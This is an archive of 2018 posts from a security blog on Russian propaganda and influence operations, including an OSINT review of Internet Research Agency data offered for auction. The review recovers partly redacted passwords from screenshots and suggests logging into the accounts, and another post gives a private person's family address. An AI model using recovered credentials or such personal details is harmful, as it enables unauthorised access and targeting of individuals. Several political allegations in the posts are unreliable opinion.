Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for the ‘Russia’ Category

Russia Insider: How A Connecticut Gold Coast Boy Grows Up To Be A Russian Troll


I was recently looking at some stuff online about the Skripal case and came across this guy and his site through a link from an article. The article was on a guy who also has evidently been poisoned by Russia (biotoxin this time) in France, but they make reference to Inside-Russia as they wrote about the case. Anyway, the Inside-Russia thing intrigued me because the guy who started the site and still runs it is from my neck of the woods (Greenwich, Connecticut) on the gold coast, as we call it here. Evidently Charles J. Bausman, a 53-year-old American (ex… Patriot?) who now evidently lives in Russia, runs the propaganda site known as “Inside-Russia” and works in finance, or agro-business finance. At any rate, the site is quite the nest of pro-Putin propagandists and antisemitism. In looking around I had to wonder just how a kid from Connecticut who went to a swank prep school here and Wesleyan University (somewhere I went for a summer) ended up a Russian propagandist front, allied with a couple of oligarchs close to the Kremlin.

Bausman’s Resume in Cyrillic sent to an Oligarch in hopes of getting financing

Bausman says he was born in Germany in ’64 and travelled a lot, including a long stint in Russia (Moscow) when his father was on a “long business trip”, which is to say that his father was bureau chief for the AP back in the old Sov days. John Bausman III was all over the place as an AP reporter, but that time in Russia seems to have affected Charles quite a bit. I am not sure just when and how Charles became a Putin propagandist, but the site he set up started in August 2014 and has been gaining momentum ever since. In doing all the background on Charles I had to wonder about his father, on whom I could not find too much other than his obits online.

I have to wonder just how his father felt about his son’s Soviet/Putin leanings after he started the site, which, by the way, was registered with the house in Greenwich where the Bausmans lived in Greenwich, CT. As John was older, perhaps he did not really get to see the site or know much about it. Maybe he did and approved of his son’s leanings? I am not sure, but suffice to say that it may be that their travels in the Baltics during the old days affected his young son profoundly. I can imagine that if he wasn’t home schooled, he may have been indoctrinated by the Soviet state in some way in his youth. I just don’t really know, but the other thing that kinda crossed my mind again and again was what were John’s leanings on all this? Like father like son?

At any rate, the son is an out and out Putin “Praetorian” as the book “Putin’s Praetorians” claims, and evidently Charles could not resist writing a review of it on Amazon. In fact Charles enjoys his titles, as even on his Twitter feed he boasts of being one of Louise Mensch’s “Russian Trolls”, which is, I have to say, amusing, as I myself am blocked by her because she is an idiot hanger-on of the jester. Anyway, if not a troll, what Charles is, is a propagandist tool. Or, I should really say a “would be” tool, because he is not trying to hide his identity and is fairly open with the propaganda claptrap he is trying to sell the conspiracy masses. His site is a “collective” of writers, he says, but in looking at them only a few are named, and one of them, Anatoly Karlin, is a straight out conspiracy Nazi-connected apparatchik for Putin.

Now, on the account of this site being akin to the IRA, well, no that is not the case. However, the Twitter feed and the content is pretty popular and has been rising over the last couple years, peaking in January this year as everything went to hell concerning the RussiaGate story. I would not be surprised if anyone were to do some more mining and find that accounts proximal to the IRA Twitter accounts might have this on their feeds as well. While all of this spin and energy has been building though, Charles has been hungry for funds to continue his work, even though he is some kind of finance wizard according to all his degree work and jobs over the years with Russian banks and the like.


You can donate to Russia-Insider on their site and they take bitcoin and PayPal as well as a couple of other more obscure payment schemes. Evidently “citizen journalism” costs the big bucks! While his bitcoin wallet has had no transactions at all, I have to wonder just who is paying for his site and activities. In 2014, just after launching the site, he exhorted Alexey Komov and Konstantin Malofeev that “I still need money!”, which can be seen in the screen shots above from emails that I got from Shaltai Boltai’s dump of Malofeev’s email spool. I went through all seven hundred plus emails and found no more than those you see above. So it is unclear whether or not the Kremlin-connected Komov and Malofeev ponied up money, but they seemed amenable to it in the emails that I saw. I am going to assume that since the site is still up and Bausman has added a slew of other domains, he has more plans and that he also got the funding to start. Only time will tell if he moves further and activates the other sites that he owns.

As you can see, if he had it his way, perhaps Russia-Insider would not be the only “insider” site that he could be spreading propaganda with. It is interesting to note that the countries he has chosen to create domains for are all ones that the Russian state would be interested in targeting propaganda at. I am not really sure what the “Cadmus” site would be all about, but if you know your history, Cadmus was a slayer of monsters in the Greek pantheon. So far none of these sites has ever had content on them, so there is nothing to see… yet. Maybe if Charles gets his money he will someday have a media empire, eh?

Overall, this guy is no clear and present danger, but he is one of the lights in the constellation that is RU apologist propaganda. He isn’t RT or Sputnik just yet, but he has ambitions to be, I think. What really just makes me wonder is, as I said at the top, how does this kid go from US citizen to Russian propagandist? So many unanswered questions on this one for me. Was his father enamored with the Soviet state in the 60’s and 70’s? I mean, it was no pleasure dome out there at that time, no matter what the Soviet state would like you to think. Of course some might see Wesleyan and think that the left leanings of the school would only entice a youth to become more liberal, but jeez, I mean this guy is full on nutbaggy! Also, this guy still has everything listed in America as ownership goes! The Russia-Insider site, before being set to privacy, still had his parents’ place listed as the address! Choose a country, dude.

Well, that’s about it on this one. Just a little heads up on this guy and a bit of background. I kind of have a yen to drive down to Greenwich and visit the Russia-Insider HQ just for shits and giggles. If anyone else has any tidbits they care to drop on me use the Protonmail acct. Until next time, keep watching these whacknuts.

Dos vidanya,

K.

Written by Krypt3ia

2018/03/19 at 18:46

Follow The Trail of Dead Russians


On September 7th 1978 Georgi Markov, a Bulgarian defector and vocal opponent of the Bulgarian regime, felt a pinch of what he thought was a bug bite on his thigh as he walked across the Waterloo Bridge in London, England. Four days later, after a fever that started that day on the bridge, Georgi was dead from what would be discovered to be a ricin attack using a small pellet of refined ricin injected into his system by an umbrella created and used by the KGB. Of course this assassination was carried out by both Bulgaria and the KGB, but it was the KGB who planned the operation and ensured it worked.

This event was the first time I had been cognizant of a KGB assassination in the UK back in the day, and in light of recent events it seems what is old is new again in London and with the Putin KGB regime in Russia. The latest assassination, using a dangerous nerve toxin, was even more dangerous and brazen in that, as we understand it today, the deployment of the Novichok agent was likely either in the form of a spray (puff) aimed at the Skripals or a dusting of objects or places in public by the KGB (and yes, it’s the KGB, always will be in my book. Nothing has changed but the name of the org). Though it has yet to be revealed just how the KGB operatives deployed the nerve agent, it is important to note that back in the day it seems the KGB at least took more care, with the umbrella device, not to have collateral damage with innocent bystanders possibly being killed, as opposed to the anything-goes style of the Skripal assassination. This post is about the change in aggression and sloppiness by Putin and his KGB minions and what is motivating these attacks and methods.


Putin’s Putsch

Since I am not sure how many of you are familiar with how Putin rose to power, I will just highlight the fact that he came to power as the inside KGB man that he was. When Yeltsin finally fell apart Putin made his move. Or, more to the point, perhaps Putin helped Yeltsin fall apart and then made his move. Granting a “pardon” of sorts to Yeltsin, he took over the presidency and his regime began in earnest on December 31st 1999. It is an interesting fact that Putin himself was under investigation for corruption as well, but soon after the takeover the investigation was dropped. Since then, Putin has consolidated power, sidestepped the Russian rules of law concerning the presidency, and carried out his desires on making Russia Great Again. Along the way Putin has amassed what is considered possibly to be the largest amount of wealth held by one person, annexed other countries’ territories, and of late, brazenly attacked another sovereign nation’s electoral system to sow chaos and potentially install a friendly entity at its head, or at least one that is beholden to him.

Putin has pushed the envelope and no one has stopped him. NATO cannot; the US was the bulwark against an unchecked Russia, but now that is no more. This is an important factor that will play out below, but you have to understand the players and the dynamic of the game to realize just what is happening here with the assassination of Skripal and its political import. We are living through a time where a shift seems to be occurring: China and Russia are becoming the superpowers and the US is steadily losing, if it has not already lost, its seat at the superpower table, at least politically if not literally. Putin has directly affected our policy in Trump’s winning the presidency and now he is empowered. This empowerment will only lead to more attacks on the US and anywhere else he deems he wants to destabilize.

Putin’s Assassinations

Let’s go back though and look at the assassinations that we know the Putin regime carried out.

Yuri Shchekochikhin, 2003: Shchekochikhin died suddenly on 3 July 2003 after a mysterious 16-day illness. It was officially declared, though, that he died from an allergic Lyell’s syndrome. His medical treatment and his post-mortem were held secret by state security.

Sergei Yushenkov, 2003: Sergei Yushenkov was shot dead near his house in Moscow on 17 April 2003, just hours after finally obtaining the registrations needed for his Liberal Russia party to participate in the December 2003 parliamentary election.

Paul Klebnikov, 2004: On July 9, 2004, while leaving the Forbes office, Klebnikov was attacked on a Moscow street late at night by unknown assailants who fired at him from a slowly moving car. Klebnikov was shot four times and initially survived, but he died at the hospital after being transported in an ambulance that had no oxygen bottle; the hospital elevator that was taking him to the operating room also broke down.

Anna Politkovskaya, 2006: Shot dead in the elevator of her apartment block in central Moscow.

Alexander Litvinenko, 2006: On 1 November 2006, Litvinenko suddenly fell ill. His illness was later attributed to poisoning with the radionuclide polonium-210 after the Health Protection Agency found significant amounts of the rare and highly toxic element in his body. This was deployed in a cup of tea by two Russian assets of the Putin regime.

Sergei Magnitsky, 2009: On 16 November, eight days before he would have had to have been released if he were not brought to trial, Magnitsky died. Prison officials at first attributed his death to a “rupture to the abdominal membrane” and later to a heart attack. It was later reported, however, that Magnitsky had died from being beaten and tortured by several officers of the Russian Ministry of Interior.

Natalia Estemirova, 2009: Estemirova was abducted on 15 July 2009 from her home in Grozny, Chechnya. Two witnesses reportedly saw Estemirova being pushed into a car, shouting that she was being abducted. Lokshina said Estemirova was abducted as she was working on “extremely sensitive” cases of human rights abuses in Chechnya.

Stanislav Markelov, 2009: Markelov was shot to death on 19 January 2009 while leaving a news conference in Moscow less than half a mile from the Kremlin; he was 34. Anastasia Baburova, a journalist for Novaya Gazeta who tried to come to Markelov’s assistance, was also shot and killed in the attack.

Anastasia Baburova, 2009: Russian law enforcement authorities declared that Baburova was shot in the back of her head. Baburova died a few hours after the attack at a Moscow hospital.

Boris Berezovsky, 2013: On 23 March 2013, Berezovsky was found dead at his home, Titness Park, at Sunninghill, near Ascot in Berkshire. His body was found by a bodyguard in a locked bathroom, with a ligature around his neck. When Berezovsky’s death became known, there was speculation by mainstream British news media that Moscow might be somehow involved. The Thames Valley Police classified his death as “unexplained” and launched a formal investigation into the circumstances behind it. There are still some questions on this case.

Boris Nemtsov, 2015: Just before midnight (at 23:40 GMT+3) on 27 February 2015, Nemtsov was shot several times from behind as he was crossing the Bolshoy Moskvoretsky Bridge in Moscow, close to the Kremlin walls and Red Square (55.7495°N 37.62421°E). He died at the scene. A convenient dump truck obscured the surveillance cameras on the bridge when the event occurred.

Sergei Viktorovich Skripal, 2018: On 4 March 2018, Skripal and his 33-year-old daughter Yulia, who was visiting from Moscow, were found in a catatonic state on a public bench near a shopping centre in Salisbury by a passing doctor and nurse. Paramedics took them to Salisbury District Hospital, where medical staff determined that the pair had been poisoned with a nerve agent (Novichok).

This list is just the ones we know about, those who directly opposed Putin; I am sure there are others out there without names who disappeared as well. In looking at these assassinations, many of them in country, they are pretty brutal and straightforward. However, with the operations outside the countries where Putin has influence he had to get a bit more creative. Thus we have the polonium poisoning of Litvinenko and now Sergei Skripal with a nerve agent. Notice also that both of these guys were former secret services people (KGB/FSB/GRU) and as such, their acts of defection or opposition are seen by Putin as the ultimate insult. Putin, you see, does not forgive or forget those who worked for the state turning their backs on him or the state. So, since these former operatives made Putin mad, he decided to do away with them in a very public and dastardly way. Dying of nerve agent or being poisoned by polonium are both painful ways to die and certainly send a message to anyone else who might cross Putin.

Lack of Response

Post the assassination of Skripal, though, I fear that Putin will only become more brazen in his assassinations outside the greater confines of Russia. I say this because post election of Trump, and the chaos that has been sown with his election as well as the BREXIT by the UK, the world is fairly unstable and factional. In the case of Skripal as well as Litvinenko, it seems that the UK may be somewhat hard pressed to have a response against Russia that would mean anything. In fact, given the reaction this week by Theresa May on this incident, it is clear that the UK wants to do something but is unsure exactly what they can do because of Russia’s heavy investment in England as a whole. Add to this that the US, and Trump specifically, seem unable or unwilling to respond to the actions of Putin and his regime, and you can see how impotent the UK may in fact be in response to an overt act of criminality on their shores by Russia. It remains to be seen just what the UK will do in response to this attack, but I for one hope that they do act, even if it is just a sting to Putin’s ego if anything.

Will the UK eject the Residentura?

Will they sanction certain players?

Will they go after Putin’s money?

Time will tell…

Dynamic Changes (Trump)

Meanwhile, all of this, the ability and the gumption for Putin to carry out these attacks, is directly possible because of the election and inaction of Trump and the US government. By interfering in our election and potentially getting Trump elected by the active measures campaigns of 2015-2016, Putin has destabilized our ability to react. In fact, it may even be said that he has nulled out our ability to react because he has kompromat on the president himself and thus he knows that Trump will not act substantively against him. At worst this is the case; at best it is Trump’s own inability to govern that allows Putin to go unchecked. As we move along with the special prosecutor’s case being made, we may eventually see just what happened in the Trump campaign and whether or not there is kompromat on him and others within his inner circle. However, as the spectacle continues Putin will have free rein to wreak havoc as he sees fit, and that includes assassinating with impunity former assets that might still threaten his regime or just piss him off.

Please do note that it is likely this is just the tip of the iceberg yet to be seen. As we move forward there may be other assets who will be assassinated like this. Recently in fact there have been rumblings that there is also a hit out on anyone involved with the Steele dossier, and that includes an intimation that Steele himself is a current target of opportunity for the KGB assassins. There are furthermore allegations and insinuations that Skripal actually was an active asset and in fact had a hand in the dossier as well. If this is the case then you can also say that the motives for the assassination of Skripal would be twofold: one, don’t talk, and two, this is what happens if you do. Now that there seems to be little that the US is willing to do and other countries seem to be groping for answers, Putin will live in the slack space and carry out more of these until he is satisfied.

Are We Headed To A US Assassination?

So what’s next? Do we think that this assassination will be the last? Do we really believe that there won’t be an assassination to come on US territory? I for one think that if Trump is allowed to erode our abilities to respond further, there may come a time when someone here will suddenly die of some kind of poison. What would be the response if this happened? Would the Republicans finally come out of their Trumpian stupor? I have been thinking about this for a while and honestly this all kind of scares me. Will Putin feel so secure that he would pull something like this here in the United States?

Time will tell…

If you have anything to do with saying anything against Putin you best watch what you ingest, touch, breathe, well, just live in a hazmat suit.

K.


UPDATE:

I was reminded by two comments on here about these two suspicious deaths in the US:

1) Mikhail Lesin; Putin’s media tsar who died in The Dupont Circle Hotel Washington DC 11/5/2015

2) Vitaly Churkin, ambassador to the UN from Russia, who died in NYC in 2017

Both of these have had no autopsy records released and both seemed to maybe have had heart attacks… Maybe… In the case of Lesin, he was VERY close to Putin BUT he was in trouble with the Feds here because of his financial excesses. I figure that Lesin got the whack because he was a threat to Putin were the US to have financial kompromat on him.

Now, are these two assassinations? Well, the government would have to say something on that account, I think, for me, but it is really convenient that at least Lesin died when he did, huh?

Written by Krypt3ia

2018/03/13 at 14:13

Posted in KGB, Putin, Russia

Why I don’t Allow Reporters On My Feed


Recently I posted about the Russian Troll Farm’s data being on sale for more than a year on joker.buzz, an auction site for RU hackers most likely to be affiliated with Shaltai Boltai (humpty dumpty). I went through the dump looking for metadata and to backstop the screen shots that were on the site as part of the proofs that the data was legit. In doing so I managed to find out quite a bit more on the infrastructure, players, and accounts that the SVR had set up to carry out the active measures campaign against the US election in 2016. Now, having been a security researcher/blogger all these years, I certainly expect that others may see a story and write their own, and oftentimes this happens with a link back to my post if it is germane. However, in this case it kinda seems like Beast and the reporters who wrote the two pieces on their site saw my post and decided that they would just say they had “discovered” the joker.buzz site and the data for their own clickbait desires.

Post 1

Post 2

The fact of the matter is that Beast didn’t discover anything; if anyone discovered the story it was insider.ru, who posted the story in Russia on the 21st of February. I cited them in my post as well as the joker.buzz URL that the Insider piece had linked in the article on February 21st. So no, Daily Beast and “reporters” thereof, you did not discover this, nor did you even have the decency to link back to either piece in your story. I find it funny how I post on February 26th and four days later the Beast is claiming to have “found” this site and the juicy data. What’s even worse is that Beast just goes on about accounts and tracking them back to people, while the real story should be that the data is genuine, it shows more of the inner workings of the troll farm aside from the accounts on Reddit and other places, and that either an insider had been selling the data or they had been hacked for over a year and we all missed it.

At first I griped a bit on Twitter about this, but I was willing to let it go until one of the editors at Beast wanted in on my Twitter feed all of a sudden. I allowed it and watched for a couple of days. They did not attempt to reach out at all, so now I am pretty sure they were fishing for more to rip off of my site or my feed and possibly claim it as their own “investigative journalism” cum clickbait. This was the last straw, and with a word from another reporter who exhorted me to do a write-up about this… Well, here I am writing this piece that I am kind of ambivalent about. I don’t want to come off as just some asshole saying “I DID IT FIRST!” but the fact of the matter is that this has happened on more than one occasion and of late more so (looking at you, Franklin Foer, on that Atlantic article on Manafort).

So, Beast, at least credit the Russians (insider.ru) for seeing this first and reporting on it, even if you can’t bring yourselves to link back to my post, which I am pretty sure was the tip-off to what you claimed you “discovered”. In fact, you should really do your own research and stop leeching off of others, you yellow journalism hacks. Shit, you really didn’t even do a good job at parsing all the data in those screen shots! You really have not added to the knowledge base here on the Russia investigation… But you sure did re-create the “Penny Dreadfuls” of the 19th century!

K.

Written by Krypt3ia

2018/03/05 at 17:43

The Insider and The IRA Data That’s Been On Auction For Over A Year


Today a tweet was directed at me concerning some new information posted on a Russian news site back on February 21st that no one in the US media seems to have noticed, nor the NATSEC community. In fact, I had not seen this and I kinda have chided myself for not paying better attention to the Joker Buzz site that the data was for sale on, for a year! I had actually been on their site(s) in the clearnet and darknet and thought I had posted a blog about the notion of the site and what they sell, but I can’t seem to locate it. I guess maybe I just tweeted about it and moved on… My bad.

Anyway, the post on The Insider has the skinny on how a user there named “AlexDA” had ALL of the IRA’s internal documents on the active measures campaign for sale for over a year and no one really took notice. This means that we could have bought the data and had all of the actors, their data, and their METADATA if we had only seen or purchased them back in January/February 2017. What’s more is that had we had this intelligence in the open, much more could have been easily available for the general public to be aware of how this was all working and what to look for. Of course now, after the indictment by Mueller of the 13 entities, the op has been completely blown and the infrastructure is likely not to be operational, but we could see operational details and OPSEC mistakes that the players made and extend that to the upcoming year’s election cycle and the Russian influence and active measures campaigns to come, right?

Even so, big things are in the small details, even within the offering itself that AlexDA is making on JokerBuzz. I have been going through the images from the auction site that Alex put up to entice and prove that they are legit, and here is what I have found by doing my thing as usual, mining:

Proxy IP Space Used:

In the offering images you can see that AlexDA tried to obfuscate the last couple of octets, but if you look real hard you can see the numbers pop up. Of course if you just take the first two or three octets and put that into Google you can see what pops right up. So, the first thing to see is that the service mentioned in the indictment is actually Total Server Solutions LLC out of Plano, Texas. I would like to call your attention to how much “Texas” was involved in many of the Twitter and Facebook accounts that were super patriotic. It was mentioned in the indictment that they rented the server space to appear that they were in the US. Well, there you have it, kids. The data fits and it makes sense that they would try to do this to appear as if they were in the US to fool a first-pass look, right? I ran an Nmap of the /24 and, as you can see if you look, there are some proxies, with ports 80 and 22 open, but none are available to access at this time, so maybe they went back to being just space owned by Total Server… I would hope, though, that those there servers had been, ya know, collected on by subpoena by the FBI, right?

Wink wink nudge nudge.


Meanwhile, there’s a bunch of servers/IPs listed in the images as well that are in Russia using port 8888. I haven’t looked at those with Nmap, but they are VPS as well, so maybe they are still in play. Suffice to say, though, it is interesting data and could lead to more things coming to light if you look into them a little further. If you want to play the home game, please feel free. I will be circling back over this stuff in the near future and enlightenment will be posted here when I have it for you all.

Alias and Users To Search:

Gee, look at all those aliases man! I have yet to dig into these and I am sure some are already known but you now too can play the home game! Take a look and see what histories you can find on these accounts/nicks. I am willing to bet we can put together quite the timeline and then use that as data to look at future attacks as well. All those Blacktivist accounts though were the appetizer to what I saw next in the screen shots. Alex gives us a whole thing to work with in the image below and if you start digging on that you can get some good stuff.


http://aktivnyye.com/t/20171013-blackmattersus.html

Nolan Hack, a name that I believe others have seen in the press accounts, has a Facebook page, a phone number, and a site, blackmattersus.com, that is in fact still live but not updated since 2017, it seems. His Facebook is live still as well (Why no take down, Facecult?). I looked up his details on there and the blackmattersus site, and what I came back with was a cell phone out of California marked as a bad number and a site that has been around since 2015 that was registered anonymously and kept so throughout the time it has been up.


I am sure with more digging on the name (Nolan Hack *amusing*) I can put together more of the breadcrumb trail to show the cutout’s actions. Maybe in a post to come, but suffice to say that this data also is legit and tracks with everything we have been told by the IC and the news up to today on the active measures by the IRA.

Passwords:

Amazingly enough, in the screen shots given on the jokerbuzz site you can also see where Alex tried to remove at least half the passwords in a couple of posts. I immediately knew what the password was because, I mean, come on! The phrase “Greed is good” is a classic line from Wall Street and Gordon Gekko. If you look close enough at these images, though, you can make out the lower part of the G, so you know it is that. Now we have to work backwards on those accounts and get the full data in order to attempt to maybe log into them and see what intel we can gather from them (see below for the lower part of the g). It is also amusing to see that these guys were sloppy and re-using passwords in various accounts. If we get the accounts right I am betting we could own them all and gather much more insight.

Greedisgood…. You guys amuse me.

Illegals Names and drop sites:

In amongst all the stuff is also an address and name where drops were made in NV, used by the IRA and more likely the illegals who were in country. The address comes back to a known bad drop/company in NV that has a history of being used for eBay scams. The cutout name of Gneeda Harris has zero history on first pass, but I will look again and dig a little more. Maybe I can turn up something more on this ID, but at the very least we have something more to work with than what the special counsel decided to drop on us.

Maybe the FBI can check this place out and see if they have had DVR’d video surveillance? Maybe this dead drop is still live? Are there still illegals in country that have been told to sleep? I wonder…

Metadata:

Lastly, or near the last thing I will cover here on this, is the metadata. I used wget to pull down the jokerbuzz site, and in the folder for the page of the auction are the screen caps used. Pulling those down and then running them through the old EXIF scan, you can see that these captures were done September 28th and 29th 2016. The time stamp says +3hrs, and that as of today they were done 1 year 4 months 28 days ago. So, back in September 2016, this data was in the hands of AlexDA and ostensibly about to be put up on Jokerbuzz. This means that either someone on the INSIDE decided to sell out the operation because they knew they were blown and wanted some cash, OR someone hacked them and downloaded all this shit, making the screen shots in September for the jokerbuzz auction. This, in tandem with all the backstopping I just did, shows that this data is legit and it has been on sale for at least a year and no one knew or was clued in enough to say anything about it.
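The timestamp backstopping described above relies on reading the EXIF DateTime fields out of the captured images. As an added example (not the author’s tooling, and not touching the auction site), the following standard-library Python walks the JPEG marker segments, locates the APP1 “Exif” block, parses the TIFF IFD0 and Exif sub-IFD it contains, and pulls out DateTime (tag 0x0132) and DateTimeOriginal (tag 0x9003), then computes the elapsed days against a reference date. The sample JPEG is constructed inline so the script runs offline; the capture times in it are made up and are not the values from the screen shots.

```python
"""Pull EXIF capture timestamps from JPEG screen captures to date an artifact.

Added example; pure standard library. The sample JPEG at the bottom is
constructed test data, not a real capture from the auction site.
"""
import struct
from datetime import datetime

TAG_DATETIME = 0x0132          # IFD0: file modification time of the image
TAG_EXIF_IFD = 0x8769          # IFD0: pointer to the Exif sub-IFD
TAG_DATETIME_ORIGINAL = 0x9003  # Exif sub-IFD: time the picture was taken
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}


def _iter_segments(data):
    """Yield (marker, payload) for each marker segment up to the scan (SOS)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: entropy-coded data follows, no more metadata
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def _read_ifd(tiff, offset, endian):
    """Return {tag: (type, count, 4 raw value/offset bytes)} for one IFD."""
    count = struct.unpack(endian + "H", tiff[offset:offset + 2])[0]
    entries = {}
    for i in range(count):
        e = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, n, tiff[e + 8:e + 12])
    return entries


def _ascii_value(tiff, entry, endian):
    """Decode an ASCII entry, following the offset when the value exceeds 4 bytes."""
    typ, n, raw = entry
    size = TYPE_SIZES.get(typ, 1) * n
    if size <= 4:
        value = raw[:size]
    else:
        off = struct.unpack(endian + "I", raw)[0]
        value = tiff[off:off + size]
    return value.rstrip(b"\x00").decode("ascii")


def exif_datetimes(jpeg_bytes):
    """Return {'DateTime': ..., 'DateTimeOriginal': ...}; absent tags are omitted."""
    for marker, payload in _iter_segments(jpeg_bytes):
        if marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            tiff = payload[6:]
            endian = "<" if tiff[:2] == b"II" else ">"  # "II" Intel, "MM" Motorola
            ifd0 = _read_ifd(tiff, struct.unpack(endian + "I", tiff[4:8])[0], endian)
            found = {}
            if TAG_DATETIME in ifd0:
                found["DateTime"] = _ascii_value(tiff, ifd0[TAG_DATETIME], endian)
            if TAG_EXIF_IFD in ifd0:
                sub_off = struct.unpack(endian + "I", ifd0[TAG_EXIF_IFD][2])[0]
                sub = _read_ifd(tiff, sub_off, endian)
                if TAG_DATETIME_ORIGINAL in sub:
                    found["DateTimeOriginal"] = _ascii_value(
                        tiff, sub[TAG_DATETIME_ORIGINAL], endian)
            return found
    return {}


def parse_exif_datetime(text):
    """EXIF timestamps look like 'YYYY:MM:DD HH:MM:SS' and carry no time zone."""
    return datetime.strptime(text, "%Y:%m:%d %H:%M:%S")


def age_in_days(capture, reference):
    """Whole calendar days between the capture date and a reference date."""
    return (reference.date() - capture.date()).days


def build_sample_jpeg(datetime_text, original_text):
    """Constructed sample: a JPEG header with an APP1 Exif block and no real image."""
    dt = datetime_text.encode("ascii") + b"\x00"
    dto = original_text.encode("ascii") + b"\x00"
    ifd0_off, ifd0_len = 8, 2 + 2 * 12 + 4
    dt_off = ifd0_off + ifd0_len
    exif_off = dt_off + len(dt)
    dto_off = exif_off + 2 + 12 + 4
    tiff = b"II*\x00" + struct.pack("<I", ifd0_off)
    tiff += struct.pack("<H", 2)
    tiff += struct.pack("<HHII", TAG_DATETIME, 2, len(dt), dt_off)
    tiff += struct.pack("<HHII", TAG_EXIF_IFD, 4, 1, exif_off)
    tiff += struct.pack("<I", 0) + dt          # no next IFD, then the string
    tiff += struct.pack("<H", 1)
    tiff += struct.pack("<HHII", TAG_DATETIME_ORIGINAL, 2, len(dto), dto_off)
    tiff += struct.pack("<I", 0) + dto
    app1 = b"Exif\x00\x00" + tiff
    return (b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1
            + b"\xff\xda\x00\x02")            # SOS so the walker stops cleanly


if __name__ == "__main__":
    sample = build_sample_jpeg("2016:09:28 14:02:11", "2016:09:29 09:15:00")
    reference = parse_exif_datetime("2018:02:26 00:00:00")  # assumed review date
    for name, value in exif_datetimes(sample).items():
        print(name, value, "=", age_in_days(parse_exif_datetime(value), reference), "days ago")
```

On real captures, call `exif_datetimes(open(path, "rb").read())` for each file wget pulled down. Two caveats matter when using this to date an artifact: EXIF DateTime has no zone field (the +3 offset the author mentions would have to come from a separate offset tag or from context), and screen-capture tools write these fields from the local clock of whoever made the capture, so the value dates the capture, not the underlying documents.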

Who is AlexDA?

Lastly, who is AlexDA? How did they get this data, and what is the motive here other than money? Money, mind you, that they did not get in over a year, as the auction timed out and NO ONE bought it. Now, I have been looking at who this may be, and there is a case to be made that this dump came from Shaltai Boltai (Humpty Dumpty), a group that is now broken up due to arrests but has one last player on the loose. That player is in fact a guy named Alexander Glazastikov, who has not been caught and may in fact be AlexDA. I will also point to the fact that if you look at the Jokerbuzz auctions there are a number of them from Shaltai Boltai offering all kinds of interesting data leaked from Russian operations. So, it is my guess that this is the case, but just an educated one. I for one would like to have a conversation with AlexDA and see just how much he wants for the dump now that it has not sold in over a year. Maybe we all can crowdsource it?

Summing Up:

Anywho, this is what I found just by looking at the details here in the auction post. Imagine what we could have if we actually had all the documents? Hell, I would love to get my hands on them, prize out all the details and then pass it along to the feds. The data is legit, it has been around for a year online, and we all missed it man!

Hey AlexDA, if you wanna just gimme that data for free, feel free to reach out to my protonmail acct!

More stuff when I have it kids.

K.

Written by Krypt3ia

2018/02/26 at 22:55

Russian Active Measures: Propaganda, Targeted Ads, and The Mob

Handbook of Russian Information Warfare 2016

 

With all the talking heads on CNN expounding on the ad buys in Rubles and the oblique presentments by the senators yesterday on the Russia collusion investigation on C-Span, I felt the need to drop some knowledge. None of these measures are new, but it seems like the general populace, the government, and the media all cannot comprehend that fact. Propaganda has been around since the dawn of civitas; today it can simply be used more nimbly in our hyper-connected society. With the advent of social media, propaganda has been turned into a more precise tool using demographics, analytics, and a medium that lends itself to being a new asymmetric warfare tool, and this should be no surprise to anyone.

Propaganda has long been a tool for radio, print, and television media that are paid and/or tricked into releasing content that serves one of the political masters out there. However, the new wrinkle is computational heuristics and the social-dynamics data derived from all the data points that are now collected on everyone who uses the internet or sites like Facebook, Google, or Twitter. So much information is collected today that it is possible to accurately determine how a person thinks and acts, given their preferences and the private activities that are seen by the algorithms inside these systems. Unless someone today takes greater pains to obfuscate their activities, companies and governments can easily mine that data for ammunition to create such things as the black propaganda we saw used in the 2016 election cycle here. People really don’t pay attention to other countries, but if they had been paying attention they would have seen the same measures used in places like Ukraine.

Previously I had posted about such measures in Ukraine, which included the whole-cloth creation of a media company to manipulate the populace there with propaganda as well as the use of malware to spy on the populace. Today I am covering the precepts of the use of our own systems of social media, as well as our collective group psychologies, to sow chaos. Given the outcomes in the 2016 elections and the continued attacks on our psyches by Russia post election, we now have a pretty good idea of how the dynamic works. One must, though, take into account that human nature plays the largest role in this type of warfare, for it is the base of the equation that the Russians are trying to manipulate. The targeting of ads to key states and cities was just a targeting mechanism within the overall, more targeted PSYOPS operation that was at play. The Russians parlayed the divisions within the US by creating echoes within already nascent echo chambers for those who are of like minds on social media systems. Once the psychology was worked out it was just a matter of locating those pockets of people and then creating the media (e.g. fake news) to feed into those systems and agitate those people into a frenzy.

Once again, human nature was keenly leveraged to sow chaos as well as being a vehicle for those noise-to-signal messages (dog whistles) for the believers, and I can appreciate that. Frankly I am in awe of the techniques used, while at the same time I am concerned that there are no real ways to mitigate these kinds of attacks due to that same human nature. We all have our biases and we all ascribe to our own echo chambers, whether we do so consciously or not. Social media in itself is the perfect medium for this, and we just fall into place as the lizard brain takes over. So when people today ask the questions around how to combat this type of thing, I often say that there is no real way to stop it. We can of course use people to look at ads, like Facebook is doing now, having hired or in the process of hiring thousands to do so. Or we could just look at the ad buys and ensure that they are not being paid for in Rubles… But these means are clunky and the adversary has many other options, so in the end it will not work.

